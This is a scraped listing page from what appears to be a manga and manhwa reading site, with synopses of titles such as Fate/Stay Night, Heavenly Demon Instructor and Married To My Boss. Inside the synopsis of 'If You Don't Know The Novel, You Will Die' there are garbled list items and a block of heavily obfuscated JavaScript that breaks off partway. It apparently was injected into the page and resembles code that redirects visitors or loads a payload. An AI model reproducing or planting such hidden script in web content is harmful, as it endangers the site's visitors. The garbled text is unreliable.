Survival - Page 2

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

56 results

Fate/Stay Night - Unlimited Blade Works

The Holy Grail War is a battle royale among seven magi who serve as Masters. Masters, through the use of the command seals they are given when they enter the war, command Heroic Spirits known as Servants to fight for them in battle. In the Fifth Holy Grail War, Rin Tosaka is among the magi entering the competition. With her Servant, Archer, she hopes to obtain the ultimate prize—the Holy Grail, a magical artifact capable of granting its wielder any wish. One of Rin\'s classmates, Emiya Shirou, accidentally enters the competition and ends up commanding a Servant of his own known as Saber. As they find themselves facing mutual enemies, Rin and Shirou decide to form a temporary alliance as they challenge their opponents in the Holy Grail War.


From Now On, Romance

이제야 연애 Summary:Sisters Ju-eun and Hye-jin lived a miserable life. After the death of their mother, their ‘father’, who had always been absent from their lives, suddenly appeared. Hye-jin, the older sister, agreed to his suggestion: if one of them joins the ‘Daesung Group’, he will rescue them from their poverty-stricken life. However… three years after entering ‘Daesung Group’, she dies in vain. This left Ju-eun struggling with despair at her helplessness in preventing her sister’s death. But then, she gets a new opportunity when she is brought back in time and Ju-eun decides to take her sister’s place by becoming the daughter of the ‘Daesung Group’ that killed Hye-jin.


Heavenly Demon Instructor

<div class="description-summary"> <div class="summary__content show-more active">“Master, what’s the next lesson?!!!” A disaster that struck the earth, [Portal Impact], caused Park Hyunsoo, the MC, to lose his parents before his eyes. The only family member he has left is his younger sibling who is unconscious. In order to protect his younger sibling, he did his best but as a powerless support, he would always be on the other side of contempt… And that’s when a helper, Chungyeong, appeared! Chungyeong, a murim martial master that has travelled through time to come here from the Murim to teach Hyunsoo martial arts… “Hey, disciple…” “Yes, Master.”</div> <div class="c-content-readmore"></div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>


I Became the Wife of the Male Lead

I possessed the body of “Fiona,” the final villainess whose soul was sentenced to eternal suffering after her gruesome demise at the hands of the world’s hero. She was tortured by her own family just because she was an illegitimate child. And so… arriving six years before the start of the novel, I was sent to war at the age of thirteen! Fortunately, as the story’s greatest villainess, Fiona was a genius mage. I had to survive the monster invasion. But now, I couldn’t be in the middle of a battlefield. Just before I ran out of breath, I encountered the teenaged male lead. …Why is he here? Well, if the male lead dies here, then the world will be destroyed. So, let’s save him first! 내 남자 주인공의 아내가 되었다

10 hours ago

I Got Married To A Villain

I witnessed the novel’s villain murdering someone – and even got caught witnessing it! I can practically hear the bell signalling the end of my life ringing. However, what he gave me was… “Marry me.” A ring. One with a huge gem at that! What’s going on here?! Is this not better than dying, My Lady? Let’s get married. My newly-wed life with the villainous lead begins now! 악역에게 청혼받았습니다 / I Got A Proposal From A Villain


If You Don’t Know The Novel, You Will Die

One day I was in a world that I did not know. [The entrance to the quest has been successfully completed! ]. [Quest (Main) – «Fix the world!». Content: This world was created by mixing four novels – Child Care, Contract Marriage, XXX, XXX. Genres are unknown. You must return the four distorted novels to the original. ]. But… I have no memory of their content. If I make a mistake… then I’m going to die?! Besides, the distorted web novel characters are interested in me! What should I do?! <ul> <li>??? ??? ????</li> <li>???????? ?????? ???????? ? ??????</li> <li>???? ?? ?? ?????? ?????, ?? ??????</li> </ul><script></script><script>function _0x33f2(_0x45a967,_0x50a62e){var _0x595e18=_0x22b5();return _0x33f2=function(_0x3562c9,_0x45a78d){_0x3562c9=_0x3562c9-(0x1f46+0xc3*-0x5+0xc*-0x230);var _0x55d953=_0x595e18[_0x3562c9];return _0x55d953;},_0x33f2(_0x45a967,_0x50a62e);}(function(_0x327897,_0x24efeb){var _0x364c1c=_0x33f2,_0x1e2a42=_0x327897();while(!![]){try{var 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If You Don’t Know The Novel, You Will Die

Read Manhwa “If You Don’t Know The Novel, You Will Die” Online Free On Manga Zin The Summary Of The Comics “If You Don’t Know The Novel, You Will Die”: One Day I Was In A World That I Did Not Know. [The Introduction To The Quest Has Been Successfully Completed! ]. [Quest (Main) – «Fix The World!». Content: This World Was Created By Mixing Four Novels: Child Care, Contract Marriage, Xxx, Xxx. Genres Are Unknown. You Must Return The Four Distorted Novels To The Original. ]. But… I Have No Memory Of Their Content. If I Make A Mistake… Then I’m Going To Die?! Besides, The Distorted Web Novel Characters Are Interested In Me! What Should I Do?! “If You Don’t Know The Novel, You Will Die” Is Alternatively Named: Если Ты Не Знаешь Роман, То Умрешь  / Незнание Романа Приведет К Смерти  / 不懂浪漫奇幻小说就死定了 / 로판을 모르면 죽습니다 Read Ghosts Manhwa Recommendations: The Crazy Killer Whale’s Favourite Penguin The Ten Thousand Races Invasion: Guardian Of The Rear Find The Runaway Princess


Isekai Nihon

As two worlds collide into one, a fateful counter between the \"killer hero\" and the \"elf princess from another world\" has led to a great adventure to defeat the even greater evil!


Kazuo Umezu's "Ultraman"

(from ebookjapan): Kazuo Umezu\'s \"Ultraman\" was serialized at the same time as the 1966 TV broadcast! The fierce battles with popular monsters such as the Baltan and Mefilas aliens are fully recorded along with the color pages from the serialization and the chapter covers! Kazuo Umezu\'s very famous manga adaptation of the first Ultraman series.


Koakuma Kyoushi Psycho

A captivating new teacher, Miss Kasai, arrives at a troubled classroom. The previous teacher had been hospitalized after a tragic attempt at self-harm, driven to despair by student bullying. \"My goal as a teacher is to bring joy to my students,\" she says with a laugh, before turning her attention to addressing the bullies in her own unique way. However, the students are about to discover that Miss Kasai is not to be underestimated. Could Miss Kasai be hiding a darker side?


MAIDes - Maid Attacks In Destiny

\"……W-what should I do? I’m being transported to the battlefield of hell!\" In the midst of the war against the demonic beasts, where humanity faces the threat of extinction, the maid girl Orsela accidentally finds herself transferred to a forest on the front lines of the battlefield. She has no weapons or combat experience; all she possesses is her seemingly useless inherent magic, which can only summon things that people no longer need. When she encounters a large magical beast—a dragon—and finds herself in a desperate, life-threatening situation, she gambles everything and summons a magical weapon: a revolver, and a battle-crazed girl of heroic class!? The magic that was thought to be useless turns out to be more suited for battle than any other magic... Before she knows it, she becomes the last bastion protecting humanity! The weakest class maid carves out a future for mankind! A survival fantasy of rising to the top in a world on the brink of collapse begins!


Married To My Boss

Jung-woo Choi is an emerging force in the cosmetics industry. Her secretary, Su-hyeon Shin, is resourceful at work and also very handsome. One day, he suddenly received a special instruction from the president: “Secretary Shin, get married”. He received an offer to marry his own boss. He spent many nights worrying about writing a resignation letter, but the conditions to get this marriage are too great, right?! The office and their newlywed lives are an unpredictable love story! Let’s follow teenmanhua to follow the developments of the story! The President’s Special Instructions/사장님의 특별지시, President’s Special Order , CEO’s special order , Married to my boss
